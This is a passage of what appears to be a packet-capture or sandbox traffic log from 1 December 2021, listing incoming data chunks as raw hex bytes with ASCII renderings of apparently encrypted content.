2021-12-01 12:26:35 UTC	36	IN	Data Raw: 9a 7f b6 52 80 0b 9b e7 af f4 56 ab 36 f0 8a 17 66 77 73 cb 85 26 29 9d e2 44 95 7c cf d3 ed 1d 71 e9 99 7e a7 24 d2 23 b9 73 68 ba da 18 1c b9 fd e1 6b 76 ac bd a2 37 df 0a 76 f2 3d db 87 7f 67 56 13 64 53 d5 09 4f 9b 7a 0e 04 91 e4 73 cf ad a1 6e 54 f2 13 11 c7 ab 1f c8 f6 50 7e 35 90 9c 34 2d 0d 7d da 24 25 8b 4a ed 35 bf 73 0d 1e 34 28 f5 6c 0d 8c cc a1 c2 cb 59 25 5f 45 e7 5e 64 20 47 0f f1 cc 1f be 9c f4 d9 45 21 2c 1d 2a 7f 5d 20 f7 7c 91 e4 3c 6a b8 aa 48 e7 ea 28 83 c2 b6 7f 14 78 1d fd 3d c2 07 02 8d 15 a5 c4 67 66 11 26 98 28 c8 87 a0 37 15 66 d3 10 c2 36 f4 78 af 1b 20 e0 ef ba 63 a9 32 99 13 8f c2 35 b6 fb 6e ee 90 d0 3a eb 24 67 e8 5c 12 90 5d e2 26 91 7a 8e cc c1 0c 8d 9d 10 dd 73 a9 14 bc 0a 98 95 2b 99 20 57 78 09 ba 3e 13 c6 84 80 b3 2a Data Ascii: RV6fws&)D\|q~$#shkv7v=gVdSOzsnTP~54-}$%J5s4(lY%_E^d GE!,] \|<jH(x=gf&(7f6x c25n:$g\]&zs+ Wx>
2021-12-01 12:26:35 UTC	38	IN	Data Raw: 5e 37 28 43 c2 a1 af d7 ec 81 85 ae 63 dc 97 f7 b6 36 b8 db 76 b3 86 c6 41 3e 10 09 17 51 71 57 57 60 87 75 8d de e5 76 ce 28 e7 b2 91 23 55 23 74 dc 30 d7 83 35 c4 c8 f2 07 8a 13 9a 63 a4 e5 82 5f 0a cc 52 03 23 f9 b0 d3 a3 ae 0d 85 bd d2 7e fa cb d2 54 2e 9b e1 ce d0 43 1c f2 4c 73 df f1 d1 0a a1 0b 19 39 1d 98 10 6f 76 ad be 64 a8 4b f8 12 8d 41 f0 f4 b2 07 67 90 73 cc 26 bd 92 b9 08 b6 d5 0b 05 4a 44 35 49 a2 90 8b ed 11 1b 3e 59 23 41 70 82 c8 af d9 27 23 66 3a 7a 6a d0 f0 be d6 36 16 a6 12 a5 84 79 ad 64 4a 26 c9 69 48 b1 d1 73 c4 bd fd ff 37 94 c7 a6 1e f6 75 03 28 c5 78 5a 10 c6 86 71 28 15 5f af 57 87 c1 3d 3a 92 21 3b 3f 08 9a c5 3e ea ad 5e b4 1d 69 ee c1 1f 33 2a 49 7c a1 cc d5 62 e5 65 02 47 62 25 c0 97 4a cc 01 92 ba 09 f5 05 f0 0a 96 49 26 Data Ascii: ^7(Cc6vA>QqWW`uv(#U#t05c_R#~T.CLs9ovdKAgs&JD5I>Y#Ap'#f:zj6ydJ&iHs7u(xZq(_W=:!;?>^i3*I\|beGb%JI&
2021-12-01 12:26:35 UTC	39	IN	Data Raw: 22 b1 1f 67 24 24 02 bb 7a cd 35 b4 ad 0a 30 4b fa f5 66 2f c8 ca 8b c8 f1 c0 c7 a0 ba fe 4d 65 20 34 60 e7 24 1e 92 9f e3 ca 42 27 3d 60 b5 70 b6 3b db 7e bb f2 34 08 46 08 b6 99 98 7e 83 c8 8f 1c 06 7d 2f b7 38 c7 2f 94 9c 10 bc e4 99 67 26 02 95 00 cf 84 a0 31 2a fb d3 01 de 05 e4 66 a2 19 44 bf fc bf 67 90 16 86 1d 7b ac 6f be c3 47 f9 0a f8 52 e5 37 68 e4 5f 15 a4 db e2 0a 90 50 b6 47 c0 06 91 a6 81 c0 60 aa 3c bd 0e 87 92 a8 cd 0c 59 75 1a c5 e5 a4 f9 fc fe c1 2b eb 22 3e 40 6b ca 47 76 b4 92 32 a8 29 26 51 ed 11 ac cf 9d f9 52 51 4b 65 4d ee bf 5b 02 c9 69 a0 b5 1b 47 64 01 1d 3c b8 ff c2 fa b0 40 3e 82 c9 0f 8b 70 6b 61 60 93 6f 42 0f 4d 77 7a 56 bf 19 08 95 14 14 e9 8e 34 3d d0 97 05 d9 cc 0c b4 61 f5 c0 e8 2a 69 8e 20 09 c6 43 be 79 88 d5 92 eb Data Ascii: "g$$z50Kf/Me 4`$B'=`p;~4F~}/8/g&1fDg{oGR7h_PG`<Yu+">@kGv2)&QRQKeM[iGd<@>pka`oBMwzV4=ai Cy
2021-12-01 12:26:35 UTC	40	IN	Data Raw: c3 18 07 15 32 15 90 8d 0b 7d 76 22 a7 47 9d 4c 6d 12 8d c6 f5 6e b2 09 7e ae cb dd 2e a8 88 aa 85 a2 f5 25 0f 5c d2 08 48 ac 9e 95 78 28 a2 35 5b 3c 57 6e 8a 12 94 c2 37 2b 7d 31 7a 6a fd 2f 76 c6 c8 1a 8c 12 af a8 e1 71 75 57 29 21 7d d2 06 ce 67 71 c2 ee fe 3d 42 9e 31 1f f7 63 10 2e d8 68 29 39 bb fd 73 35 10 57 21 e0 8d f4 b6 8d 7e 36 e1 28 8d 17 ee 2f c2 13 52 bc 13 ec 5e c0 71 8a 3b 4c 6e 96 f2 ff 71 e2 4d 26 4d 74 2a b9 58 c5 7b 16 90 4f b0 2e 2d e7 7f db 43 0e 50 77 26 fc 91 e9 c8 3e 0f 90 25 65 11 d4 a1 10 db 78 04 0d 0a 5a e7 3d 33 d0 30 df 98 41 cd ff 8a f0 07 8c 16 e3 45 31 95 f0 84 d1 74 ac cf a0 e7 f0 77 98 56 db 20 18 3c 89 14 b7 57 93 9e 2b 44 fb bd c3 b8 8a 84 79 a4 a9 f5 13 b5 22 67 2a 9f 3b df e4 5f c0 09 78 9b 4c fd 21 2e 1b d8 ce 1e Data Ascii: 2}v"GLmn~.%\Hx(5[<Wn7+}1zj/vquW)!}gq=B1c.h)9s5W!~6(/R^q;LnqM&MtX{O.-CPw&>%exZ=30AE1twV <W+Dy"g;_xL!.
2021-12-01 12:26:35 UTC	42	IN	Data Raw: 0d 4f a0 c7 19 67 81 19 b1 02 85 ad 49 ba ea 61 ec 22 96 4e ea 22 7b 69 49 10 b8 24 f7 32 8f 7a 3d cd c1 0c b3 a4 85 dd 79 bc 38 a5 17 14 a0 56 cc 21 41 54 9e c0 6b 19 ea 9e ef c5 33 78 13 2d 45 6a cd 6a f8 4b 93 14 8a 25 de 37 ed 11 a4 de 1a f9 52 5b 44 71 63 e2 7e 14 1c 37 6a a4 a7 30 95 71 1b 09 2f ab e6 b9 90 4f 41 18 98 b3 a5 99 78 73 62 51 e3 6a 42 18 c4 51 84 57 92 1e 08 86 3a 63 b0 8e 32 1f e2 b9 02 d5 a8 1d 24 65 ff da ea 26 65 ec b3 17 cd b7 ac 5f 8c d9 88 ea 97 14 5b 01 80 03 04 f3 44 62 f0 3a 49 6f f6 4b df 2d f3 17 51 e4 b1 a7 00 ff f1 4a c6 3e 40 86 72 e0 00 26 a5 50 62 dd 85 bd fd 9b b7 b5 2f e5 ab cf a2 59 14 14 d8 3f 38 ec 7d 87 58 1b a2 8e 56 9a f5 91 2f cc 49 97 a2 58 e1 30 4a bd ff 1e 51 29 68 9e ea e0 89 f6 46 db 95 14 65 29 fc 45 58 Data Ascii: OgIa"N"{iI$2z=y8V!ATk3x-EjjK%7R[Dqc~7j0q/OAxsbQjBQW:c2$e&e_[Db:IoK-QJ>@r&Pb/Y?8}XV/IX0JQ)hFe)EX
2021-12-01 12:26:35 UTC	43	IN	Data Raw: 40 a4 12 b1 23 72 20 3f 58 85 57 9c f1 79 0e a4 21 3b 3f 5b 9a 5b 2d c2 12 32 b6 1b 62 e2 da 61 50 25 49 78 89 f8 d7 62 e2 4d 2c 45 62 32 af 50 4b e5 02 95 c1 3d f1 05 f4 71 db 49 26 dd 77 26 f7 93 df cc 39 08 9a 34 60 1e 4c a0 01 cb 04 16 34 09 53 f4 39 22 c5 12 5a 66 40 eb e1 5c 8e 51 a5 21 e9 6d bd 85 f7 96 b4 fc 95 cf aa e0 34 64 94 7c ca 2a 05 d2 88 38 f4 46 c1 b6 f4 9f fb a6 9c b5 8a 85 62 53 ad f5 2e d3 22 67 0a 0d 3b ce e6 1a cb 0b 17 73 4e fd 2b 34 28 da da c7 25 ce a3 45 18 25 ca a2 d8 47 a5 4a 2d 16 cb de 67 77 9d 3f 4a 53 ac e7 9e eb b5 fa 42 a1 27 e6 9f 04 8e 88 5e ec e0 6d f9 26 e6 57 92 4b d6 c0 ea 17 48 9a 80 80 ac 20 c9 20 af 39 15 bf c5 0f 16 a0 fa f0 70 6e b9 49 5d 1a fa 24 11 d0 3c da 98 74 5c 4c 12 75 53 e2 74 b0 9a 5c 2a f4 d3 ed 60 Data Ascii: @#r ?XWy!;?[[-2baP%IxbM,Eb2PK=qI&w&94`L4S9"Zf@\Q!m4d\|8FbS."g;sN+4(%E%GJ-gw?JSB'^m&WKH 9pnI]$<t\LuSt\`
2021-12-01 12:26:35 UTC	44	IN	Data Raw: 53 49 0d 39 be c6 4a e1 4e 47 3a 3e ba b3 8d 7a bf 7e 5c a8 5d 42 1e 42 7d 80 24 29 0d 0e 9d 36 63 d2 8e 32 1f 2a 97 03 f9 a2 d0 b4 61 ff da fb 2f 1c ea 25 03 d7 bd bf 54 86 e3 9e c3 36 7a 58 01 e5 2b 93 e3 5b 74 c9 a8 61 1f ff 63 57 41 6b 10 79 ca a0 ad 18 db d0 13 7c 3e 46 a8 ee 92 ba 2c b4 73 40 a8 e9 6e fb f4 25 a7 20 f9 a9 cb 88 3d 3d 67 db 2e 31 d5 e4 1c 4b 15 a2 a3 56 df f6 91 23 8e d4 ae 90 53 f0 3a 49 90 a4 e6 53 29 68 a5 7a 3f 9b d9 7f c5 bd 62 6c 3a f2 02 f8 a9 fb f6 4e 9e e4 7e 3d 0a 14 fe 6e aa de 91 94 0c 6a 58 4f 65 46 fa a7 86 7d ee 90 87 ae 56 dd 97 f7 b6 82 b8 db 76 da 22 64 43 34 3e c1 77 51 77 40 7a ba 16 75 8b fc 48 70 d8 33 8f e7 18 22 5f 23 0c 78 22 c7 9a 53 83 0e f2 0d 99 05 b6 11 bf ca cb dc 0b ca 37 85 24 f1 d9 dd a8 bf 00 99 bd Data Ascii: SI9JNG:>z~\]BB}$)6c2*a/%T6zX+[tacWAky\|>F,s@n% ==g.1KV#S:IS)hz?bl:N~=njXOeF}Vv"dC4>wQw@zuHp3"_#x"S7$
2021-12-01 12:26:35 UTC	45	IN	Data Raw: 37 a3 93 3b 86 f7 81 d2 4d 98 e7 38 ee 2e 71 f1 f6 da 20 1f 3f 8f 05 be 46 c9 b6 37 9c fb aa b6 32 8b 85 64 87 a7 e4 27 a4 2e 4f 90 9c 3b c8 89 f9 c8 0b 11 7a f4 fd 2b 3e 3b d2 cb 3c 31 30 a2 d6 11 5b 59 fb da 4d b3 3b 01 16 cb 8d 73 89 9c 06 64 76 bd 09 b3 ca 9d a0 50 ab 2d e6 9c 0a 94 5e 3c c3 fb 6d 46 17 e7 57 95 0c 5a c0 ea 17 71 e9 a9 37 a6 08 de 33 a7 22 00 92 55 19 05 a0 d7 a2 6b 7b 9b 38 5d 36 f9 31 44 c3 34 f6 b1 0c 6d 44 12 62 4a f0 76 43 8a 76 4c e4 8c ef 66 d9 a0 a1 63 24 db ef 10 ed b2 03 df d2 00 47 39 83 9d 25 31 22 58 27 25 0f fc 68 cf 35 b8 75 1c 3b 4b 3e f4 66 2f ca e3 a3 c8 f7 d2 d3 7e b5 d9 65 54 20 56 02 f4 3c 36 aa 9f e3 c0 9c 21 2c 16 22 a6 b0 2d ca 72 ab f2 3a f7 b8 aa 48 88 89 3e 55 db 8f 1b 04 69 05 70 8e f8 49 6a 72 ea a5 c4 67 Data Ascii: 7;M8.q ?F72d'.O;z+>;<10[YM;sdvP-^<mFWZq73"Uk{8]61D4mDbJvCvLfc$G9%1"X'%h5u;K>f/~eT V<6!,"-r:H>UipIjrg
2021-12-01 12:26:35 UTC	47	IN	Data Raw: b3 16 98 af 86 b7 94 d0 2d b4 29 e9 92 52 b0 70 36 76 dd 50 ec c4 ea 8c 70 77 b2 a7 74 81 ee 90 29 a9 be b0 a0 52 f6 3c 70 33 d4 6b 54 46 44 b4 7d e7 8f f7 89 e7 98 4a 51 29 fa 20 d3 a0 88 de 91 8b e3 75 15 23 13 d6 08 77 de 90 d1 8a 7b 58 49 48 43 c4 a5 74 84 ee 94 99 86 dd dd 8c cd da 0c e5 db 7c b5 f0 65 43 2f 65 cd 77 51 7b 59 79 ba a9 74 8b f2 73 61 cc 22 8e a0 c3 20 5f 23 33 ba 33 d7 8f 35 7d c9 f2 07 47 1a 94 28 81 e2 aa d5 07 e4 60 0f 25 fb 01 ce a4 d0 2b 89 b4 fe 79 ed c9 d8 7f 04 e3 ab c7 fe d8 05 f0 4a 66 b4 26 d5 84 1c c3 26 26 24 ab 03 66 6a b3 9e 77 81 5a fb dd 85 dd c9 f3 bf 01 60 b8 57 ca 26 ab a3 bc 17 a9 fd 3a 04 4a 4e 29 40 af d9 83 ea 23 aa 3e 58 3e 60 7b 95 42 bc d1 36 75 77 33 e5 ae 58 3f ac db 14 91 d9 3d ae a9 e9 5b 7d 5a 21 31 57 Data Ascii: -)Rp6vPpwt)R<p3kTFD}JQ) u#w{XIHCt\|eC/ewQ{Yytsa" _#335}G(`%+yJf&&&$fjwZ`W&:JN)@#>X>`{B6uw3X?=[}Z!1W
2021-12-01 12:26:35 UTC	48	IN	Data Raw: 4e c6 d3 c0 2a 9d e0 38 14 62 c2 c6 c7 1f 66 c4 97 91 a0 67 50 21 af 35 11 60 c9 0e 16 a2 c2 6d 7a 71 b3 a6 5a 27 fb 0b 11 5b 3d da 81 6c 46 57 14 75 51 e7 08 c7 9a 70 25 df 85 fe 66 d9 a5 a9 06 c2 fe ed 16 f8 a9 1f c7 f2 e0 60 3b 89 b6 7c 2d 01 4f ab 24 09 99 6f f2 24 b4 5b 82 37 24 23 d8 50 56 c0 cf a1 ce e2 cd ca ac ab f5 22 4b 22 56 0e f6 3e 0f 99 f0 c7 c8 42 27 2c 16 24 7a cc 07 d9 7e bc f0 08 23 ea 56 b7 9f f7 03 81 c8 98 0c 04 74 78 e9 38 c7 25 4a 82 30 8b d9 67 66 00 05 90 00 97 87 a0 3d 9b 66 c2 09 c3 ea e5 6f b3 11 4a a2 d1 d1 98 7e ec b1 be 86 ad 45 c4 7f 65 f8 00 f0 65 b4 27 6d e2 66 8b b8 25 e9 0e 07 52 9e c7 e9 93 9b b5 8f b2 c6 ae 3c a6 64 1f 9e 56 c6 37 38 f4 0a c1 61 7c 4f 81 fe cb 38 f1 04 83 46 6b dd 31 e9 4b 93 14 ae 3a 0b 56 76 11 a6 Data Ascii: N*8bfgP!5`mzqZ'[=lFWuQp%f`;\|-O$o$[7$#PV"K"V>B',$z~#Vtx8%J0gf=foJ~Eee'mf%R<dV78a\|O8Fk1K:Vv
2021-12-01 12:26:35 UTC	49	IN	Data Raw: aa c8 6d a6 c1 40 41 3e 10 18 be 51 71 59 68 f5 c3 06 a9 f4 5b 70 dd 36 99 9c 81 30 30 02 19 a2 37 b8 a1 58 bb cf e3 19 88 07 de 23 b4 e2 ac b0 2f ce 58 09 34 e5 ce dd cd 8b 05 88 b2 95 77 f8 cb de 68 38 98 14 c4 f8 f6 73 d8 48 60 dd f1 d1 95 02 72 3f 02 0c 96 11 7e 48 78 b7 4f 8b 77 68 dd 8b c9 fb 0c b5 1f 60 b8 4c a3 71 b7 81 b6 c5 a2 f9 10 05 4a 4f 31 40 b3 97 83 18 39 07 97 58 2b 50 78 95 1e be d1 ef 2a d4 4f f6 d3 e2 3f ac d1 1c 97 3e 10 d7 b8 ee 7d 6a 58 21 37 64 6c bb d1 20 aa ea fd 95 3d 48 fc b9 0e 7a 4e 03 28 c6 6b a2 03 bd eb 64 ba 04 59 b8 41 00 e0 3e 22 b2 bd 2a 39 42 8c 59 3e c4 08 49 28 0a 64 f2 c9 fd 41 2c 55 6e 15 f3 d1 7f f5 d1 3d 43 7c 35 33 41 4d d3 0e 83 5d 16 f2 1a fe 68 47 58 20 d8 7c 30 6a 91 e9 d4 35 0d 05 25 66 61 41 b6 8c cc 11 Data Ascii: m@A>QqYh[p6007X#/X4wh8sH`r?~HxOwh`LqJO1@9X+PxO?>}jX!7dl =HzN(kdYA>"9BY>I(dA,Un=C\|53AM]hGX \|0j5%faA
2021-12-01 12:26:35 UTC	50	IN	Data Raw: f4 92 ba 2c b4 73 40 a9 f8 96 fa f4 2b 9c 38 ed ba c3 98 21 3f 67 dd 17 26 c6 ea 80 37 d7 b3 a7 74 30 f8 b4 01 94 d1 96 a8 5e d8 02 58 94 dd b5 52 2f 10 9d 7c e1 8d d4 40 f0 bd 64 4e 78 f9 2a c6 81 e2 fe 93 8d 8a b8 3d 1b 19 08 0c 8c f6 a0 fb 8b 61 55 61 70 43 c2 af 59 7d e8 ab 82 9a dd dc 97 fd df 0c a5 f9 7c bb b4 65 43 3f 16 77 47 51 6d 1f 7f ca 9f 75 8b f7 40 46 c7 22 6c 8a 90 23 33 25 1b b3 42 6d 89 5a b1 c3 8c 9e 99 14 bb 0c c8 71 aa df 01 df 5d 71 0b f0 df ca 8a b9 05 88 b2 f7 58 d2 0b db 79 2a 98 33 c7 f8 fa 34 6e 4a 60 d1 f3 d1 95 12 35 19 03 0c 96 2e 61 66 b5 6b ed 83 5a f1 12 81 f3 76 f2 a3 0b 73 b0 46 c4 0e 76 82 bc 1f 9b 37 3b 05 40 66 d2 41 b3 9f ec 28 38 aa 34 4a 23 59 50 09 1e bc db 1e 3d 75 33 f2 ce e5 2e ab fc 19 91 ac cf c6 ab ed 73 7c Data Ascii: ,s@+8!?g&7t0^XR/\|@dNx=aUapCY}\|eC?wGQmu@F"l#3%BmZq]qXy34nJ`5.afkZvsFv7;@fA(84J#YP=u3.s\|
2021-12-01 12:26:35 UTC	51	IN	Data Raw: 93 0a 92 67 58 af df 69 29 9b f7 5d 82 67 ad e6 e8 1d 66 ff 8b a8 76 0b d8 26 c0 19 04 ba dc 1e 14 a0 95 f6 7b 71 b9 a6 52 59 34 1c 7e d8 06 77 79 80 b0 98 04 75 57 88 5c 4e 9b 71 0f c0 9f e1 15 f3 ad b0 68 24 a8 ed 10 e1 7f d0 db ff 47 56 3b 83 91 27 31 79 dd 24 25 03 98 6a f5 35 be 79 d3 34 22 03 f2 4c 25 e2 cd e0 fc f1 c1 d9 a0 ba fc 14 63 20 56 6b e6 32 1e 2e 9e e3 ca 54 21 3d 1a 35 70 a3 21 db 7e ba e1 02 0b 46 55 79 98 98 29 57 c9 9e 0a 00 78 17 fe 23 c7 2f 95 9e 25 a6 ee 63 67 0a 16 f3 28 af 96 b6 24 40 5e 26 01 d4 3c f6 76 a7 01 a5 b5 c3 b3 4f af 11 99 15 89 b4 50 b2 fb 75 fd 15 f3 b3 eb 08 61 ed 5f 14 86 4f e3 26 9b 4d 92 de c4 06 8a b0 9f 23 72 83 33 ba 09 f7 56 56 cc 2a 40 a6 18 c5 66 08 d5 85 fe d0 2e ef d2 2c 69 6e f0 91 71 59 96 1e b7 2e 19 Data Ascii: gXi)]gfv&{qRY4~wyuW\Nqh$GV;'1y$%j5y4"L%c Vk2.T!=5p!~FUy)Wx#/%cg($@^&<vOPua_O&M#r3VV*@f.,inqY.
2021-12-01 12:26:35 UTC	52	IN	Data Raw: 97 fb d9 0c b9 c3 7d b5 ae 7b 42 3e 16 62 77 51 71 49 7f c4 84 6e bb f5 5b 36 cf 22 88 f9 90 23 4e 56 a1 a2 31 dd 83 24 87 c9 f2 07 b1 cc b2 00 b0 f5 c5 e2 0b cc 52 22 22 f7 d4 13 bd af 07 88 6a ee 74 d2 fc d8 79 26 a3 ac c1 f3 d8 24 f2 4a 6a 06 e9 d4 84 16 63 14 03 0c 96 2b be 63 be b0 58 ee 67 f1 03 8f d7 eb 9d 12 00 60 b2 5a c5 35 b9 97 af 14 8b 3f 3a 05 4a 5f 17 51 be 0f 90 e1 47 96 3e 59 2f 78 a1 96 1e ba c0 33 03 53 33 f4 d7 f5 50 91 d1 1e 9d b4 14 87 bc ec 73 60 49 27 1f a5 5f b1 d7 07 19 eb fd f5 49 5a ed a6 05 98 7d 02 28 cd 6b af 03 bd d5 a9 25 15 59 c0 e5 9d f1 32 4e b6 21 3b 24 48 9d d4 29 ea ce 5c b4 1d 0d 5b de 61 5a 5e 5b 78 89 f9 c4 6a f1 45 3d 4d ec 94 b8 8a 63 ca 07 95 ea 16 f3 14 fc 56 3b 49 26 c1 64 2f 85 a2 ed cb 3f 08 93 25 6a 6f 49 Data Ascii: }{B>bwQqIn[6"#NV1$R""jty&$Jjc+cXg`Z5?:J_QG>Y/x3S3Ps`I'_IZ}(k%Y2N!;$H)\[aZ^[xjE=McV;I&d/?%joI
2021-12-01 12:26:35 UTC	54	IN	Data Raw: 59 b9 29 f5 6c 09 d3 dc a7 d9 f4 e9 31 a3 ba fa 58 75 08 12 09 e7 38 09 08 b7 08 c9 42 27 28 0c 1d 34 a2 21 d1 68 20 c9 07 0a 46 53 9f 05 98 29 89 a7 b8 08 15 7e 3c cd 28 c2 07 78 8e 15 a5 81 fa 66 0a 1c b1 0d be 81 b1 32 6d 8a d0 01 d2 29 e0 4f e6 18 5b be f8 20 4f 6a 10 99 15 90 bb 6b f3 fa 64 f2 1c 62 22 cc 26 6d e2 5f 16 90 c8 e0 26 9d 3d b4 cf c1 00 9d a4 83 b2 64 ae 3c a6 1a 92 f0 91 cc 20 5d 46 c0 3f 94 ec 18 96 ef cb 5e cf 2c 2d 44 47 d7 53 67 3f a8 1e a6 2a 61 29 ed 11 ac 2a 1f f1 45 87 44 7e 59 e6 bf 57 92 80 57 f6 4d cf 6a a5 1d 2b 11 8f ee c7 e8 5d 46 61 31 ba b3 81 7b 49 53 79 80 60 9c 1c 4e 44 83 7d 93 0d 4f a3 3c 4b e8 8e 32 15 a2 97 05 d3 e9 c1 b4 61 5f db fb 2f 7f 9f 25 16 cd bd bf 55 9d d3 9a c3 b9 7b 58 01 45 2a 93 f2 8d 69 e1 13 74 1f Data Ascii: Y)l1Xu8B'(4!h FS)~<(xf2m)O[ Ojkdb"&m_&=d< ]F?^,-DGSg?a)ED~YWWMj+]Fa1{ISy`ND}O<K2a_/%U{XE*it
2021-12-01 12:26:35 UTC	55	IN	Data Raw: 12 5a f1 09 89 c0 f0 e0 a3 10 72 a7 5d 32 27 9b 87 97 06 ac f6 29 17 4a 5f 0b 5c 4d 94 af ee 47 39 3e 59 2f 43 7d 88 0d ae d1 27 39 68 14 0a dc ce 30 bd dc 0f 99 29 a5 90 a9 ec 73 6a 47 09 24 6d 5c a0 c3 77 8d 14 fc d3 37 59 e0 b1 c8 e4 68 1c 0f d4 6a a4 03 a9 e4 8c 27 39 56 dc ed 9c f1 32 30 be 32 29 3f 4a 88 da 21 3c 13 73 b3 0d 71 f9 c0 6e 43 38 49 69 9b fd f6 9c e2 61 20 54 6a 2b c0 78 49 cc 01 8a e3 14 e6 05 e5 6c c4 46 d8 c6 5b 2f ce 85 ed cb 39 04 89 27 72 7e 5d b2 0f cf e9 1d 20 13 41 fe 2f b8 fc 18 47 98 47 d1 dd 7a e1 22 ae 37 a3 3c 3a 86 f7 8f c8 4f 86 cf b1 ff 31 7a 60 7d f7 28 08 25 9a 05 a8 59 d6 8c ae 8e e9 b3 d5 46 8b a9 7f 85 aa e2 a3 ea 22 67 0b 8c 34 df e9 65 d6 30 8a 43 43 92 62 39 28 d0 c9 3d 3a c3 b0 d5 19 34 d8 e4 cc b9 a4 3f 25 07 Data Ascii: Zr]2')J_\MG9>Y/C}'9h0)sjG$m\w7Yhj'9V202)?J!<sqnC8Iia Tj+xIlF[/9'r~] A/GGz"7<:O1z`}(%YF"g4e0CCb9(=:4?%
2021-12-01 12:26:35 UTC	56	IN	Data Raw: f1 72 06 08 a7 61 f2 35 66 f5 5e 8a ae 34 e8 37 8b c8 f1 04 c1 06 91 ad 5f b2 9c af 3c a6 07 89 94 47 dc ba 7f 76 0f c1 6d 7c 3a 80 fe cb 3a ff 3d 3d 52 bd 41 6a 66 4e 93 18 c9 d7 0e 7e e7 4e 8a 83 1f f2 43 41 cd 60 59 e5 bf 4e 86 58 a1 8c b3 3a 82 a1 67 e1 39 b8 e4 d4 e7 5f 4a 03 9b ad 65 11 66 70 60 68 90 7d 94 84 27 a7 84 57 99 15 d4 f8 d3 4b ea 84 21 13 87 b5 07 d3 a5 d3 a5 70 fa b5 32 2f 69 95 3f 27 e3 ac ae 5d f2 fb 98 c3 b9 6a 49 10 80 44 b7 f0 44 6e f0 02 70 1a 9a 6d db 42 6d 07 40 c6 ac a9 12 d0 b6 11 c7 3e 40 a8 f4 f0 6f 3b b5 79 40 be 96 aa 2d e7 3f a5 3f fe ad fb ad 8f c3 98 ca 36 29 12 f9 8f 49 18 a2 b4 40 4d 0b 6e d6 7d c4 b3 8a 65 f0 3a 52 87 c5 18 e8 29 6e bc 70 c9 b1 fc 57 f8 63 60 60 03 f3 00 c0 e8 e7 fc 93 8b e5 7e 3d 3a 13 d6 02 6c dc Data Ascii: ra5f^47_<Gvm\|::==RAjfN~NCA`YNX:g9_Jefp`h}'WK!p2/i?']jIDDnpmBm@>@o;y@-??6)I@Mn}e:R)npWc``~=:l
2021-12-01 12:26:35 UTC	58	IN	Data Raw: 12 83 21 3b 35 48 9f d4 2a ea 23 5f b4 11 4f e2 ac db 50 2a 43 73 54 3f d7 62 e3 5c 29 6d 3e 23 af 56 46 c5 2f 76 c2 07 f2 2d 10 7d db 4f 0e 9a 77 26 f0 93 eb c2 11 fd 9a 34 66 56 ab a3 10 db 3f 41 0c 0a 56 e7 3f 2b fc f0 40 98 47 ef 1c 57 e1 24 8c 7c e3 45 3d 95 ff 99 f3 40 90 cf a6 c5 33 73 9e 7a f3 7d 19 2c 8f 07 b0 5e ed 80 aa 9f fd 84 c6 bc 8a 83 4a c9 ad f5 28 b9 33 6f 22 b1 39 ce e0 65 e1 25 17 52 46 eb 05 6b 5b f8 d8 34 23 dd aa d6 10 34 ce d3 3f 44 a5 15 3e 10 e3 a0 65 77 97 09 60 51 ac 08 8e e2 a4 ef 3e 8f 25 f7 93 0a 91 67 58 af dd 69 29 9b f7 5e bb 43 c6 c0 ec 72 4a ec 81 86 a0 19 d1 4f b8 32 06 b0 04 17 20 82 cd e1 7a 7b a0 bd 74 0e f3 1c 74 0c 3c 04 92 5a 67 71 12 64 53 ee 6c 3d 21 70 23 c6 85 c7 58 c8 ad ba b7 49 f9 c7 17 c1 a3 0e ce 9b 5b Data Ascii: !;5H#_OPCsT?b\)m>#VF/v-}Ow&4fV?AV?+@GW$\|E=@3sz},^J(3o"9e%RFk[4#4?D>ew`Q>%gXi)^CrJO2 z{tt<ZgqdSl=!p#XI[
2021-12-01 12:26:35 UTC	59	IN	Data Raw: 29 61 69 7f 6d 94 42 e1 1e 48 64 ac 46 93 0d 04 84 3b 5a ee a6 ae 15 f4 9d 1a c3 8b 29 b5 61 f5 cb fd f5 7e 45 3a 39 dc ba 97 c9 9d d3 90 dc af 53 b1 00 86 21 45 ed 7d 35 3b 00 64 17 e4 4e f1 a8 6a 16 5b 62 ff ad 12 d7 f1 08 c4 3e 4c a2 f4 e7 17 fa a7 7f 5b a9 97 b4 c5 ca d0 4b d0 e7 92 59 b0 70 36 6d 05 2d 16 f3 ea 86 52 39 9d a5 7e e8 fc b9 11 a3 d1 9c 7c 52 f6 10 58 94 96 77 52 29 6e b6 7d e1 89 fc 57 f2 c7 63 66 29 80 2b c0 a9 e9 fc 93 8b ff 7e 3d 1a 08 e6 05 a9 d8 96 fb 8b 15 58 49 59 41 c8 a7 91 12 0f 80 83 8c c2 83 a4 f5 db 1b d6 d3 7d b5 a4 6f 45 16 8a 77 77 5b 59 35 7e c4 8f 78 f8 d0 5a 76 c4 31 8e 99 96 37 77 0d 1f a2 37 c0 04 5d bb c9 f3 1e 91 05 b9 16 c8 86 aa df 0f 6e 49 07 31 e5 f7 07 a3 ae 0d 99 b2 ee 79 d3 cf d8 7f 3b 3d af c7 f8 f1 0f fa Data Ascii: )aimBHdF;Z)a~E:9S!E}5;dNj[b>L[KYp6m-R9~\|RXwR)n}Wcf)+~=XIYA}oEww[Y5~xZv17w7]nI1y;=
2021-12-01 12:26:35 UTC	60	IN	Data Raw: 71 b6 52 d9 20 1f 04 6c 15 b7 5d ed 02 ae 9f f1 bf df b1 a2 12 61 94 ab dd 00 b7 22 61 22 7a 3a ce ec 5b 55 0b 17 58 5f f9 2d 10 d8 d9 da 32 0d e0 a1 c7 1f 0d 2f fa da 4d 8d 8f 2f 16 c1 94 62 71 b5 f1 4b 53 aa 26 b1 e9 b5 e1 79 4e 26 f7 9f 33 04 76 5f ca e8 6e 38 9b ce 79 91 63 c4 d6 c2 33 60 ee 8b 96 58 09 c9 27 87 1d 04 ba dc 0e 2d 84 fa e1 70 67 4d b6 03 1a f4 08 72 0f 9b da 87 7f 5e 40 3a 4a 5b fd 61 58 b3 5e 23 cc 84 f9 4e 88 de 92 6b 4b f9 fe 18 fa ab 26 99 d8 6f 67 54 ab 99 34 3a 1b 6f 35 23 66 b7 40 cd 33 af 7b 1c 32 0c 2b f4 66 23 8d eb a3 c8 f7 d0 d3 88 f9 f8 4d 65 4f 7c 0a e7 34 19 83 97 8c dd 43 21 37 c4 60 03 81 23 db 78 a9 e8 15 02 6e 02 b5 99 9e 46 ab ca 9e 0c 04 71 06 f9 56 e3 2d 94 8b 04 aa ff 62 4e 08 17 9d 2e c0 a1 a2 37 43 77 da 29 97 Data Ascii: qR 